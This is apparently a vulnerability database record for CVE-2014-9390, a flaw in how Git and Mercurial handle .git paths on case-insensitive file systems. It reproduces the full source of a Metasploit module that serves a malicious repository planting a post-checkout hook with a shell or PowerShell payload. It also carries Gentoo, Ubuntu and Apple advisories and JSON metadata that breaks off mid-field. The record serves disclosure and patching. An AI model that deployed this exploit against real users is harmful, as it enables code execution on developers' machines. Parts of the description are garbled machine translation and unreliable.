var-202002-0749
Vulnerability from variot

Git before 1.8.5.6, 1.9.x before 1.9.5, 2.0.x before 2.0.5, 2.1.x before 2.1.4, and 2.2.x before 2.2.1 on Windows and OS X; Mercurial before 3.2.3 on Windows and OS X; Apple Xcode before 6.2 beta 3; mine all versions before 08-12-2014; libgit2 all versions up to 0.21.2; Egit all versions before 08-12-2014; and JGit all versions before 08-12-2014 allow remote Git servers to execute arbitrary commands via a tree containing a crafted .git/config file with (1) an ignorable Unicode codepoint, (2) a git~1/config representation, or (3) mixed case that is improperly handled on a case-insensitive filesystem. Remote for multiple products Git The server is vulnerable to the execution of arbitrary commands. ..(1) Negligible Unicode Code point, (2) git~1/config Expression, or (3) Cleverly crafted with mixed cases that are improperly processed on case-insensitive filesystems .git/config Arbitrary commands can be executed through the tree containing the files. Git is prone to a vulnerability that may allow attackers to overwrite arbitrary local files. Successful exploits may allow an attacker to write arbitrary files in the context of the user running the affected application. libgit2 and so on are all products. libgit2 is a portable Git core development package implemented in C language. Apple Xcode, etc. are all products of Apple (Apple). Apple Xcode is an integrated development environment provided to developers, Matt Mackall Mercurial, etc. are all products of Matt Mackall (Matt Mackall) software developers. An input validation error vulnerability exists in several products. The vulnerability stems from the failure of the network system or product to properly validate the input data.

Background

Git is a free and open source distributed version control system designed to handle everything from small to very large projects with speed and efficiency. ##

This module requires Metasploit: http://metasploit.com/download

Current source: https://github.com/rapid7/metasploit-framework

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Powershell

def initialize(info = {}) super(update_info( info, 'Name' => 'Malicious Git and Mercurial HTTP Server For CVE-2014-9390', 'Description' => %q( This module exploits CVE-2014-9390, which affects Git (versions less than 1.8.5.6, 1.9.5, 2.0.5, 2.1.4 and 2.2.1) and Mercurial (versions less than 3.2.3) and describes three vulnerabilities.

    On operating systems which have case-insensitive file systems, like
    Windows and OS X, Git clients can be convinced to retrieve and
    overwrite sensitive configuration files in the .git
    directory which can allow arbitrary code execution if a vulnerable
    client can be convinced to perform certain actions (for example,
    a checkout) against a malicious Git repository.

    The third vulnerability with similar characteristics only affects
    Mercurial clients on Windows, where Windows "short names"
    (MS-DOS-compatible 8.3 format) are supported.

    Today this module only truly supports the first vulnerability (Git
    clients on case-insensitive file systems) but has the functionality to
    support the remaining two with a little work. 
  ),
  'License' => MSF_LICENSE,
  'Author' => [
    'Jon Hart <jon_hart[at]rapid7.com>' # metasploit module
  ],
  'References'     =>
    [
      ['CVE', '2014-9390'],
      ['URL', 'https://community.rapid7.com/community/metasploit/blog/2015/01/01/12-days-of-haxmas-exploiting-cve-2014-9390-in-git-and-mercurial'],
      ['URL', 'http://git-blame.blogspot.com.es/2014/12/git-1856-195-205-214-and-221-and.html'],
      ['URL', 'http://article.gmane.org/gmane.linux.kernel/1853266'],
      ['URL', 'https://github.com/blog/1938-vulnerability-announced-update-your-git-clients'],
      ['URL', 'https://www.mehmetince.net/one-git-command-may-cause-you-hacked-cve-2014-9390-exploitation-for-shell/'],
      ['URL', 'http://mercurial.selenic.com/wiki/WhatsNew#Mercurial_3.2.3_.282014-12-18.29'],
      ['URL', 'http://selenic.com/repo/hg-stable/rev/c02a05cc6f5e'],
      ['URL', 'http://selenic.com/repo/hg-stable/rev/6dad422ecc5a']

    ],
  'DisclosureDate' => 'Dec 18 2014',
  'Targets' =>
    [
      [
        'Automatic',
        {
          'Platform' => [ 'unix' ],
          'Arch'     => ARCH_CMD,
          'Payload'        =>
            {
              'Compat'      =>
                {
                  'PayloadType' => 'cmd cmd_bash',
                  'RequiredCmd' => 'generic bash-tcp perl bash'
                }
            }
        }
      ],
      [
        'Windows Powershell',
        {
          'Platform' => [ 'windows' ],
          'Arch'     => [ARCH_X86, ARCH_X86_64]
        }
      ]
    ],
  'DefaultTarget'  => 0))

register_options(
  [
    OptBool.new('GIT', [true, 'Exploit Git clients', true])
  ]
)

register_advanced_options(
  [
    OptString.new('GIT_URI', [false, 'The URI to use as the malicious Git instance (empty for random)', '']),
    OptString.new('MERCURIAL_URI', [false, 'The URI to use as the malicious Mercurial instance (empty for random)', '']),
    OptString.new('GIT_HOOK', [false, 'The Git hook to use for exploitation', 'post-checkout']),
    OptString.new('MERCURIAL_HOOK', [false, 'The Mercurial hook to use for exploitation', 'update']),
    OptBool.new('MERCURIAL', [false, 'Enable experimental Mercurial support', false])
  ]
)

end

def setup # the exploit requires that we act enough like a real Mercurial HTTP instance, # so we keep a mapping of all of the files and the corresponding data we'll # send back along with a trigger file that signifies that the git/mercurial # client has fetched the malicious content. @repo_data = { git: { files: {}, trigger: nil }, mercurial: { files: {}, trigger: nil } }

unless datastore['GIT'] || datastore['MERCURIAL']
  fail_with(Exploit::Failure::BadConfig, 'Must specify at least one GIT and/or MERCURIAL')
end

setup_git
setup_mercurial

super

end

def setup_git return unless datastore['GIT'] # URI must start with a / unless git_uri && git_uri =~ /^\// fail_with(Exploit::Failure::BadConfig, 'GIT_URI must start with a /') end # sanity check the malicious hook: if datastore['GIT_HOOK'].blank? fail_with(Exploit::Failure::BadConfig, 'GIT_HOOK must not be blank') end

# In .git/hooks/ directory, specially named files are shell scripts that
# are executed when particular events occur.  For example, if
# .git/hooks/post-checkout was an executable shell script, a git client
# would execute that file every time anything is checked out.  There are
# various other files that can be used to achieve similar goals but related
# to committing, updating, etc. 
#
# This builds a fake git repository using the knowledge from:
#
#   http://schacon.github.io/gitbook/7_how_git_stores_objects.html
#   http://schacon.github.io/gitbook/7_browsing_git_objects.html
case target.name
when 'Automatic'
  full_cmd = "#!/bin/sh\n#{payload.encoded}\n"
when 'Windows Powershell'
  psh = cmd_psh_payload(payload.encoded,
                        payload_instance.arch.first,
                        remove_comspec: true,
                        encode_final_payload: true)
  full_cmd = "#!/bin/sh\n#{psh}"
end

sha1, content = build_object('blob', full_cmd)
trigger = "/objects/#{get_path(sha1)}"
@repo_data[:git][:trigger] = trigger
@repo_data[:git][:files][trigger] = content
# build tree that points to the blob
sha1, content = build_object('tree', "100755 #{datastore['GIT_HOOK']}\0#{[sha1].pack('H*')}")
@repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content
# build a tree that points to the hooks directory in which the hook lives, called hooks
sha1, content = build_object('tree', "40000 hooks\0#{[sha1].pack('H*')}")
@repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content
# build a tree that points to the partially uppercased .git directory in
# which hooks live
variants = []
%w(g G). each do |g|
  %w(i I).each do |i|
    %w(t T).each do |t|
      git = g + i + t
      variants << git unless git.chars.none? { |c| c == c.upcase }
    end
  end
end
git_dir = '.' + variants.sample
sha1, content = build_object('tree', "40000 #{git_dir}\0#{[sha1].pack('H*')}")
@repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content
# build the supposed commit that dropped this file, which has a random user/company
email = Rex::Text.rand_mail_address
first, last, company = email.scan(/([^\.]+)\.([^\.]+)@(.*)$/).flatten
full_name = "#{first.capitalize} #{last.capitalize}"
tstamp = Time.now.to_i
author_time = rand(tstamp)
commit_time = rand(author_time)
tz_off = rand(10)
commit = "author #{full_name} <#{email}> #{author_time} -0#{tz_off}00\n" \
         "committer #{full_name} <#{email}> #{commit_time} -0#{tz_off}00\n" \
         "\n" \
         "Initial commit to open git repository for #{company}!\n"
if datastore['VERBOSE']
  vprint_status("Malicious Git commit of #{git_dir}/#{datastore['GIT_HOOK']} is:")
  commit.each_line { |l| vprint_status(l.strip) }
end
sha1, content = build_object('commit', "tree #{sha1}\n#{commit}")
@repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content
# build HEAD
@repo_data[:git][:files]['/HEAD'] = "ref: refs/heads/master\n"
# lastly, build refs
@repo_data[:git][:files]['/info/refs'] = "#{sha1}\trefs/heads/master\n"

end

def setup_mercurial return unless datastore['MERCURIAL'] # URI must start with a / unless mercurial_uri && mercurial_uri =~ /^\// fail_with(Exploit::Failure::BadConfig, 'MERCURIAL_URI must start with a /') end # sanity check the malicious hook if datastore['MERCURIAL_HOOK'].blank? fail_with(Exploit::Failure::BadConfig, 'MERCURIAL_HOOK must not be blank') end # we fake the Mercurial HTTP protocol such that we are compliant as possible but # also as simple as possible so that we don't have to support all of the protocol # complexities. Taken from: # http://mercurial.selenic.com/wiki/HttpCommandProtocol # http://selenic.com/hg/file/tip/mercurial/wireproto.py @repo_data[:mercurial][:files]['?cmd=capabilities'] = 'heads getbundle=HG10UN' fake_sha1 = 'e6c39c507d7079cfff4963a01ea3a195b855d814' @repo_data[:mercurial][:files]['?cmd=heads'] = "#{fake_sha1}\n" # TODO: properly bundle this using the information in http://mercurial.selenic.com/wiki/BundleFormat @repo_data[:mercurial][:files]["?cmd=getbundle&common=#{'0' * 40}&heads=#{fake_sha1}"] = Zlib::Deflate.deflate("HG10UNfoofoofoo")

# TODO: finish building the fake repository

end

# Build's a Git object def build_object(type, content) # taken from http://schacon.github.io/gitbook/7_how_git_stores_objects.html header = "#{type} #{content.size}\0" store = header + content [Digest::SHA1.hexdigest(store), Zlib::Deflate.deflate(store)] end

# Returns the Git object path name that a file with the provided SHA1 will reside in def get_path(sha1) sha1[0...2] + '/' + sha1[2..40] end

def exploit super end

def primer # add the git and mercurial URIs as necessary if datastore['GIT'] hardcoded_uripath(git_uri) print_status("Malicious Git URI is #{URI.parse(get_uri).merge(git_uri)}") end if datastore['MERCURIAL'] hardcoded_uripath(mercurial_uri) print_status("Malicious Mercurial URI is #{URI.parse(get_uri).merge(mercurial_uri)}") end end

# handles routing any request to the mock git, mercurial or simple HTML as necessary def on_request_uri(cli, req) # if the URI is one of our repositories and the user-agent is that of git/mercurial # send back the appropriate data, otherwise just show the HTML version if (user_agent = req.headers['User-Agent']) if datastore['GIT'] && user_agent =~ /^git\// && req.uri.start_with?(git_uri) do_git(cli, req) return elsif datastore['MERCURIAL'] && user_agent =~ /^mercurial\// && req.uri.start_with?(mercurial_uri) do_mercurial(cli, req) return end end

do_html(cli, req)

end

# simulates a Git HTTP server def do_git(cli, req) # determine if the requested file is something we know how to serve from our # fake repository and send it if so req_file = URI.parse(req.uri).path.gsub(/^#{git_uri}/, '') if @repo_data[:git][:files].key?(req_file) vprint_status("Sending Git #{req_file}") send_response(cli, @repo_data[:git][:files][req_file]) if req_file == @repo_data[:git][:trigger] vprint_status("Trigger!") # Do we need this? If so, how can I update the payload which is in a file which # has already been built? # regenerate_payload handler(cli) end else vprint_status("Git #{req_file} doesn't exist") send_not_found(cli) end end

# simulates an HTTP server with simple HTML content that lists the fake # repositories available for cloning def do_html(cli, _req) resp = create_response resp.body = <<HTML Public Repositories

Here are our public repositories:

    HTML

    if datastore['GIT']
      this_git_uri = URI.parse(get_uri).merge(git_uri)
      resp.body << "<li><a href=#{git_uri}>Git</a> (clone with `git clone #{this_git_uri}`)</li>"
    else
      resp.body << "<li><a>Git</a> (currently offline)</li>"
    end
    
    if datastore['MERCURIAL']
      this_mercurial_uri = URI.parse(get_uri).merge(mercurial_uri)
      resp.body << "<li><a href=#{mercurial_uri}>Mercurial</a> (clone with `hg clone #{this_mercurial_uri}`)</li>"
    else
      resp.body << "<li><a>Mercurial</a> (currently offline)</li>"
    end
    resp.body << <<HTML
        </ul>
      </body>
    </html>
    

    HTML

    cli.send_response(resp)
    

    end

    # simulates a Mercurial HTTP server def do_mercurial(cli, req) # determine if the requested file is something we know how to serve from our # fake repository and send it if so uri = URI.parse(req.uri) req_path = uri.path req_path += "?#{uri.query}" if uri.query req_path.gsub!(/^#{mercurial_uri}/, '') if @repo_data[:mercurial][:files].key?(req_path) vprint_status("Sending Mercurial #{req_path}") send_response(cli, @repo_data[:mercurial][:files][req_path], 'Content-Type' => 'application/mercurial-0.1') if req_path == @repo_data[:mercurial][:trigger] vprint_status("Trigger!") # Do we need this? If so, how can I update the payload which is in a file which # has already been built? # regenerate_payload handler(cli) end else vprint_status("Mercurial #{req_path} doesn't exist") send_not_found(cli) end end

    # Returns the value of GIT_URI if not blank, otherwise returns a random .git URI def git_uri return @git_uri if @git_uri if datastore['GIT_URI'].blank? @git_uri = '/' + Rex::Text.rand_text_alpha(rand(10) + 2).downcase + '.git' else @git_uri = datastore['GIT_URI'] end end

    # Returns the value of MERCURIAL_URI if not blank, otherwise returns a random URI def mercurial_uri return @mercurial_uri if @mercurial_uri if datastore['MERCURIAL_URI'].blank? @mercurial_uri = '/' + Rex::Text.rand_text_alpha(rand(10) + 6).downcase else @mercurial_uri = datastore['MERCURIAL_URI'] end end end .


    Gentoo Linux Security Advisory GLSA 201612-19


                                           https://security.gentoo.org/
    

    Severity: Normal Title: Mercurial: Multiple vulnerabilities Date: December 07, 2016 Bugs: #533008, #544332, #578546, #582238 ID: 201612-19


    Synopsis

    Multiple vulnerabilities have been found in Mercurial, the worst of which could lead to the remote execution of arbitrary code.

    Background

    Mercurial is a distributed source control management system.

    Affected packages

    -------------------------------------------------------------------
     Package              /     Vulnerable     /            Unaffected
    -------------------------------------------------------------------
    

    1 dev-vcs/mercurial < 3.8.4 >= 3.8.4

    Description

    Multiple vulnerabilities have been discovered in Mercurial. Please review the CVE identifier and bug reports referenced for details.

    Impact

    A remote attacker could possibly execute arbitrary code with the privileges of the process.

    Workaround

    There is no known workaround at this time.

    Resolution

    All mercurial users should upgrade to the latest version:

    # emerge --sync # emerge --ask --oneshot --verbose ">=dev-vcs/mercurial-3.8.4"

    References

    [ 1 ] CVE-2014-9390 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9390 [ 2 ] CVE-2014-9462 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9462 [ 3 ] CVE-2016-3068 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3068 [ 4 ] CVE-2016-3069 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3069 [ 5 ] CVE-2016-3105 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3105 [ 6 ] CVE-2016-3630 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3630

    Availability

    This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

    https://security.gentoo.org/glsa/201612-19

    Concerns?

    Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.

    License

    Copyright 2016 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

    The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

    http://creativecommons.org/licenses/by-sa/2.5

    . Content-Disposition: inline

    ==========================================================================Ubuntu Security Notice USN-2470-1 January 14, 2015

    git vulnerability

    A security issue affects these releases of Ubuntu and its derivatives:

    • Ubuntu 14.10
    • Ubuntu 14.04 LTS
    • Ubuntu 12.04 LTS

    Summary:

    Git could be made to run programs as your login if it received specially crafted changes from a remote repository.

    Software Description: - git: fast, scalable, distributed revision control system

    Details:

    Matt Mackall and Augie Fackler discovered that Git incorrectly handled certain filesystem paths. The remote attacker would need write access to a Git repository that the victim pulls from.

    Update instructions:

    The problem can be corrected by updating your system to the following package versions:

    Ubuntu 14.10: git 1:2.1.0-1ubuntu0.1

    Ubuntu 14.04 LTS: git 1:1.9.1-1ubuntu0.1

    Ubuntu 12.04 LTS: git 1:1.7.9.5-1ubuntu0.1

    After a standard system update you need to set the core.protectHFS and/or core.protectNTFS Git configuration variables to "true" if you store Git trees in HFS+ and/or NTFS filesystems. If you host Git trees, setting the core.protectHFS, core.protectNTFS, and receive.fsckObjects Git configuration variables to "true" will cause your Git server to reject objects containing malicious paths intended to overwrite the Git metadata.

    References: http://www.ubuntu.com/usn/usn-2470-1 CVE-2014-9390

    Package Information: https://launchpad.net/ubuntu/+source/git/1:2.1.0-1ubuntu0.1 https://launchpad.net/ubuntu/+source/git/1:1.9.1-1ubuntu0.1 https://launchpad.net/ubuntu/+source/git/1:1.7.9.5-1ubuntu0.1 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

    APPLE-SA-2015-03-09-4 Xcode 6.2

    Xcode 6.2 is now available and addresses the following:

    subversion Available for: OS X Mavericks v10.9.4 or later Impact: Multiple vulnerabilities in Apache Subversion Description: Multiple vulnerabilities existed in Apache Subversion, the most serious of which may have allowed an attacker with a privileged position to spoof SSL servers via a crafted certificate. These issues were addressed by updating Apache Subversion to version 1.7.19. This issue was addressed by adding additional checks. CVE-ID CVE-2014-9390 : Matt Mackall of Mercurial and Augie Fackler of Mercurial

    Xcode 6.2 may be obtained from: https://developer.apple.com/xcode/downloads/

    To check that the Xcode has been updated:

    • Select Xcode in the menu bar
    • Select About Xcode
    • The version after applying this update will be "6.2".

    Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT1222

    This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/

    -----BEGIN PGP SIGNATURE----- Version: GnuPG/MacGPG2 v2.0.22 (Darwin) Comment: GPGTools - http://gpgtools.org

    iQIcBAEBAgAGBQJU+lGxAAoJEBcWfLTuOo7tERsQAJ5wHQDlzixLxaGFWO57SoAk oK5d6Lfs4p4E7YQ7JxVKPkVEj7l+w4tAhkBhsWpRunA7S5Ym8y44w4VL5SWU8EN6 BDm1QsLQK60Y1RPIztF2UOuUK26++pnFfLqd1R+q8b4Ir/T/gVZPWao1fkjltpcS aoQIIhFK1HHLvQypwto68198rPvn3iLolOwWgBuVgyfUi2IRRk1A+8+omsaBD6DV BC/l0Zu9z85NFzzAobBEBpUSTMpWBuYJB81huKTRPQrynanYThA7zX6gsRJX78zN sbB0VP3Knh8vMlPaX+xLX20pZ+mFTpUNOirN2wwTkI1CmO+9pbXOkFxleJJ52o/n 4NxRuHMdMCC1r7HpnVauWmvcPedWV71YXo+ck3n9zLb7VUzjiIls6haFfYohgVTz /iLzxPrA6UzP2zgD5pve6LOi8N1jO6b6b8QhAa4mxveHc9LUdirJLYsWnjuJh8I3 s7vt9hT4EJGkA3gSCNWBXoNWvYwFG9t1uuCcHD5OJCrSOKx0U8Il8y0kqj34hcBc xYQEmokSyq1GZwGkCo81pFtYJntuxx/9KT5eodFHtzwSsOSZEkg5quHOVOfhE/sz 1rfpo1zJj+nprPEMsAkCRdB7HPHnBh1yqZGdqjzrMoztXCUa4SPFCkJEUYetmNod mOKMaqe/h2aG+8notXKn =F+Wn -----END PGP SIGNATURE-----

    Show details on source website


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202002-0749",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "git",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "git scm",
            "version": "2.1.0"
          },
          {
            "model": "git",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "git scm",
            "version": "2.2.1"
          },
          {
            "model": "git",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "git scm",
            "version": "2.0.5"
          },
          {
            "model": "git",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "git scm",
            "version": "2.2.0"
          },
          {
            "model": "git",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "git scm",
            "version": "1.8.5.6"
          },
          {
            "model": "jgit",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "eclipse",
            "version": "3.4.2"
          },
          {
            "model": "git",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "git scm",
            "version": "2.0.0"
          },
          {
            "model": "mercurial",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "mercurial",
            "version": "3.2.3"
          },
          {
            "model": "xcode",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "apple",
            "version": "6.1.1"
          },
          {
            "model": "egit",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "eclipse",
            "version": "08-12-2014"
          },
          {
            "model": "libgit2",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "libgit2",
            "version": "0.21.3"
          },
          {
            "model": "jgit",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "eclipse",
            "version": "3.5.0"
          },
          {
            "model": "git",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "git scm",
            "version": "2.1.4"
          },
          {
            "model": "git",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "git scm",
            "version": "1.9.5"
          },
          {
            "model": "xcode",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apple",
            "version": "6.2"
          },
          {
            "model": "jgit",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "eclipse",
            "version": "3.5.3"
          },
          {
            "model": "git",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "git scm",
            "version": "1.9.0"
          },
          {
            "model": "egit",
            "scope": null,
            "trust": 0.8,
            "vendor": "eclipse",
            "version": null
          },
          {
            "model": "jgit",
            "scope": null,
            "trust": 0.8,
            "vendor": "eclipse",
            "version": null
          },
          {
            "model": "git",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "git scm",
            "version": "1.8.5.6"
          },
          {
            "model": "git",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "git scm",
            "version": "1.9.5"
          },
          {
            "model": "git",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "git scm",
            "version": "2.0.5"
          },
          {
            "model": "git",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "git scm",
            "version": "2.1.4"
          },
          {
            "model": "git",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "git scm",
            "version": "2.2.1"
          },
          {
            "model": "libgit2",
            "scope": null,
            "trust": 0.8,
            "vendor": "libgit2",
            "version": null
          },
          {
            "model": "mercurial",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "mercurial",
            "version": "3.2.3"
          },
          {
            "model": "xcode",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "apple",
            "version": "6.2 beta 3"
          },
          {
            "model": "linux lts i386",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "12.04"
          },
          {
            "model": "linux lts amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "12.04"
          },
          {
            "model": "linux",
            "scope": null,
            "trust": 0.3,
            "vendor": "gentoo",
            "version": null
          },
          {
            "model": "xcode",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "2.4.1"
          },
          {
            "model": "xcode",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "3.1"
          },
          {
            "model": "xcode",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "3.0"
          },
          {
            "model": "xcode",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "2.3"
          },
          {
            "model": "xcode",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "2.2"
          },
          {
            "model": "xcode",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "2.1"
          },
          {
            "model": "xcode",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "2.0"
          }
        ],
        "sources": [
          {
            "db": "BID",
            "id": "71732"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-008933"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-9390"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:a:git-scm:git:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "1.8.5.6",
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:a:git-scm:git:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "1.9.5",
                        "versionStartIncluding": "1.9.0",
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:a:git-scm:git:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2.0.5",
                        "versionStartIncluding": "2.0.0",
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:a:git-scm:git:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2.1.4",
                        "versionStartIncluding": "2.1.0",
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:a:git-scm:git:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2.2.1",
                        "versionStartIncluding": "2.2.0",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:a:mercurial:mercurial:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "3.2.3",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:a:apple:xcode:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "6.1.1",
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:apple:xcode:6.2:-:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:apple:xcode:6.2:beta_2:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:a:eclipse:egit:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "08-12-2014",
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:eclipse:jgit:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "3.4.2",
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:eclipse:jgit:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "3.5.3",
                    "versionStartIncluding": "3.5.0",
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:libgit2:libgit2:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "0.21.3",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2014-9390"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Matt Mackall and Augie Fackler",
        "sources": [
          {
            "db": "BID",
            "id": "71732"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201412-509"
          }
        ],
        "trust": 0.9
      },
      "cve": "CVE-2014-9390",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
